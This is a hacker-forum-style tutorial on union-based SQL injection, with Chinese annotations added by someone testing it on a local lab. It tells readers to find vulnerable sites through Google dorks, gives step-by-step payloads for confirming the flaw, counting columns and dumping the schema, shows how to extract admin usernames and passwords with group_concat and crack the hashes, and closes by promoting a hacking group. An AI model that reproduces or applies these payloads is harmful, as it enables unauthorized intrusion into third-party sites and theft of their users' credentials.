Simplified Tutorial of Union Based Sql injection
Mozzila firefox
Hackbar modded (google for modded hackbar)
First Dorking
Google this Google dorks there will be specific dorks that you may use
One you choose a dork and a site
Example: www.site.com/index.php?id=1
Put this symbols ' or *
加个单引号或者 * ,可以探索出该点存在SQLI 注入点(字符型注入点)
www.site.com/index.php?id=1'
then of you see an error (Mysql error Etc.)
It means vulnerable
Then colum counting 下面使用了 ORDER BY [数字] 的方式,来判断某个表有多少列。
www.site.com/index.php?id=1'+ORDER+BY+1-- (no error)
www.site.com/index.php?id=1'+ORDER+BY+2-- (no error)
www.site.com/index.php?id=1'+ORDER+BY+3-- (no error)
www.site.com/index.php?id=1'+ORDER+BY+4-- (no error)
www.site.com/index.php?id=1'+ORDER+BY+5-- (error)
Note the error is on number 5 so it means the number of colums is 4. (最多4列,因为第五列报错了)
So lets check for the vuln column count by the example below and put - after the id=
www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,2,3,4--
(运行这个,会得到下面的结果,目的是为了得知该SQLI注入可以成功(获得不到任何数据,暂时,只要可以看到数字1,2,3,4就可以))
id = -1 的目的,是为了让2,3 可以显示出来。 因为很多时候,php后端取到如果有2行结果的话,就只会显示上面的一行。
如果 id = 1的话, union之后是2行结果。 如果id = -1, 那么union之后是一行结果,也就是下面的 1, 2, 3
id username password 1 2 3
There will be a number that will pop out example the vuln number is 2 put it like this.
Then to check for the database, user, version is like the example below and just replace the databse for user and version same thing that you put like database
http://www.site.com/index.php?id=-1+UNION+ALL+SELECT+1%2C%40%40database%2C3%2C4--
上面这里是原文错误。 原文中url decode之后,参数是: id=-1 union all select1, @@database, 3 --
实际上MySQL 5.7中没有 @@database 变量,但是有 database() 函数。所以这里可以写成:
id=-1' union select 1,database(),3 --+
经过url encode之后,完整路径是: (使用了sqlilab的url )
http://localhost/sqliphp7/Less-1/?id=-1%27%20union%20select%201,database(),3%20--+
此时可以看到结果:(出现了sqli 数据库的名称)
id username password 1 sqli 3
To dump data use dios on your hackbar just select union based then find dios mysql then pick anything
www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4--
上面这个SQL我没看懂。。。从墓地上看似乎是想获得 username?
Then find the admin and username it may different to other sites.
After you got the username and pass form the the tables (ex. uname and pass)
used group_concat
id=-1+UNION+ALL+SELECT+1,group_concat(uname,0x3c62723e,pass),3,4
也就是下面的这个
http://www.site.com/index.php?id=-1+UNION+ALL+SELECT+1%2Cgroup_concat%28uname%2C0x3c62723e%2Cpass%29%2C3%2C4
the 0x3c62723e is <br> and from admin it came from the admin or sometimes is different form other site
The after you got a pass and it is encrypted just decrypt it here haskiller
Like our page "COD3X CYBER ARMY"